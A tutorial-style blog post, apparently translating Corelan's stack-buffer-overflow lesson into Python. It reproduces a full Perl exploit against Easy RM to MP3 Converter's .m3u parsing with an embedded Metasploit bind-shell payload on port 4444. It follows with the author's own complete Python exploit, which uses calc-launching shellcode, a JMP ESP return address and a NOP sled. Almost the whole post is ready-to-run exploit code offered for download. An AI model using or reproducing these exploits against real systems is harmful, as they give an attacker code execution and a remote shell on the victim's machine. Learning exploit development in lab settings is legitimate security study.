i followed corelan tutorials for BOF exploitation (Which are awesome ) so i will convert it into videos and i will use Python instead of Perl

the fisrt tut about a vulnerability in Easy RM to MP3 Conversion Utility
which was reported by Crazy_Hacker with a POC (SP2 ENG) doesn’t work for me

corelanc0d3r rewrote the exploit to work under SP3 :

#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
# Greetings to Saumil and SK :-)
#
# tested on Windows XP SP3 (En)
#
#
#
my $file= "exploitrmtomp3.m3u";

my $junk= "A" x 26094;
my $eip = pack('V',0x01ccf23a);  #jmp esp from MSRMCcodec02.dll

my $shellcode = "\x90" x 25;

# windows/shell_bind_tcp - 703 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

I tried the exploit under (SP2 ENG) and found it doesn’t work. So i wrote the exploit in Python:

#!/usr/bin/env python
#
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit
# Vulnerability discovered by Crazy_Hacker who reported with a POC
# The poc was for SP2 (it doesn’t work) http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt
# Corelanc0d3r wrote the sploit again but to work under SP3
# http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
#

import sys

m3uf = sys.argv[1]

buff = ‘A’ *26072
buff += ‘\x3a\xf2\xa8\x01’ # EIP overwrite MSRMCc_2 (01A8F23A JMP ESP)
buff += ‘CCCC’ # 4 bytes of garbage
buff += ‘\x90’ *25 # 25 bytes of nop sleds

# sh-4.1$ msfpayload windows/exec CMD=calc r | msfencode -a x86 -b ‘\x00\x09\x0a’ -t c
buff += (“\xba\xf8\x41\x8a\x4a\xd9\xf7\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1”
“\x32\x83\xeb\xfc\x31\x53\x0e\x03\xab\x4f\x68\xbf\xb7\xb8\xe5”
“\x40\x47\x39\x96\xc9\xa2\x08\x84\xae\xa7\x39\x18\xa4\xe5\xb1”
“\xd3\xe8\x1d\x41\x91\x24\x12\xe2\x1c\x13\x1d\xf3\x90\x9b\xf1”
“\x37\xb2\x67\x0b\x64\x14\x59\xc4\x79\x55\x9e\x38\x71\x07\x77”
“\x37\x20\xb8\xfc\x05\xf9\xb9\xd2\x02\x41\xc2\x57\xd4\x36\x78”
“\x59\x04\xe6\xf7\x11\xbc\x8c\x50\x82\xbd\x41\x83\xfe\xf4\xee”
“\x70\x74\x07\x27\x49\x75\x36\x07\x06\x48\xf7\x8a\x56\x8c\x3f”
“\x75\x2d\xe6\x3c\x08\x36\x3d\x3f\xd6\xb3\xa0\xe7\x9d\x64\x01”
“\x16\x71\xf2\xc2\x14\x3e\x70\x8c\x38\xc1\x55\xa6\x44\x4a\x58”
“\x69\xcd\x08\x7f\xad\x96\xcb\x1e\xf4\x72\xbd\x1f\xe6\xda\x62”
“\xba\x6c\xc8\x77\xbc\x2e\x86\x86\x4c\x55\xef\x89\x4e\x56\x5f”
“\xe2\x7f\xdd\x30\x75\x80\x34\x75\x89\xca\x15\xdf\x02\x93\xcf”
“\x62\x4f\x24\x3a\xa0\x76\xa7\xcf\x58\x8d\xb7\xa5\x5d\xc9\x7f”
“\x55\x2f\x42\xea\x59\x9c\x63\x3f\x3a\x43\xf0\xa3\xbd”)

f= open(m3uf, ‘w’)
f.write(buff)
f.close
print ‘\n[+] File written successfully in %s\n’ % m3uf

Check out the video:

script i used in the tutorial:
m3u.py download
the exploit in python:
Easy_RM_to_MP3-exp.py download

Advertisements